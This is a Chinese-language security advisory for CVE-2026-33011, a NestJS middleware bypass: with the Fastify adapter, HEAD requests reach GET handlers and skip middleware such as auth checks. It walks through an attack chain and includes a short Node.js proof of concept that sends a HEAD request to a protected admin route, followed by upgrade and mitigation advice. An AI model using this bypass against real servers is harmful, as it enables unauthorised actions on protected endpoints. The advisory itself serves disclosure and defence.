CVE-2026-33011 CVSS 7.5 高危

CVE-2026-33011 NestJS中间件绕过漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33011

漏洞类型

中间件绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NestJS

漏洞概述

NestJS 是构建 Node.js 应用的框架。在 11.1.15 及以下版本中，使用 @nestjs/platform-fastify 的应用存在中间件绕过漏洞。因 Fastify 自动将 HEAD 请求重定向至 GET 处理程序，导致中间件被跳过。攻击者可利用此漏洞绕过安全检查，虽然响应体丢失，但处理程序仍被执行，破坏系统完整性。该问题已在 11.1.16 版本修复。

技术细节

该漏洞源于 NestJS 集成 Fastify 适配器时的 HTTP 方法处理机制。当客户端发送 HEAD 请求时，Fastify 默认行为是将其映射到同一路径的 GET 处理程序。然而，这一映射过程发生时机早于 NestJS 中间件链的执行，导致原本绑定在 GET 路由上的中间件（如鉴权、限流或日志记录）被完全绕过。尽管底层的处理程序逻辑会被触发，但由于响应协议限制（HEAD 请求不应有响应体），Fastify 会截断响应体。攻击者利用此缺陷，可以在不满足中间件安全策略的情况下触发业务逻辑，导致未授权操作或完整性破坏，且由于无需用户交互，利用门槛极低。

攻击链分析

STEP 1

侦察

攻击者识别出目标应用使用 NestJS 框架并集成了 @nestjs/platform-fastify 适配器。

STEP 2

构造请求

攻击者找到受中间件保护（如需要认证或特定Header）的 GET 接口，并将请求方法从 GET 修改为 HEAD。

STEP 3

漏洞利用

发送 HEAD 请求。Fastify 自动将其重定向到对应的 GET 处理程序，但由于机制缺陷，NestJS 中间件链被完全跳过。

STEP 4

达成影响

业务逻辑处理程序在未经过安全检查的情况下执行，导致状态改变或敏感信息泄露（尽管响应体被截断），破坏了系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-33011
// Demonstrates middleware bypass using HEAD method on NestJS (Fastify)

const http = require('http');

const options = {
  hostname: 'localhost',
  port: 3000,
  path: '/admin/users',    // A route protected by middleware (e.g., Auth Guard)
  method: 'HEAD'           // Using HEAD triggers the bypass
};

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  // If vulnerable, status might be 200 (handler executed) but content-length is 0
  // and the middleware (e.g., logging or auth check) was skipped.
  if (res.statusCode === 200) {
    console.log('Middleware bypassed! Handler executed without body.');
  }
});

req.on('error', (e) => {
  console.error(`Request error: ${e.message}`);
});

req.end();

影响范围

NestJS <= 11.1.15

防御指南

临时缓解措施

建议立即将受影响的 NestJS 应用升级至 11.1.16 或更高版本以彻底修复该漏洞。对于暂时无法升级的环境，应在网关或负载均衡器层面配置规则，拦截对敏感路由的 HEAD 方法请求，或确保 Fastify 服务器配置不会自动映射 HEAD 请求到未授权的 GET 处理程序。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表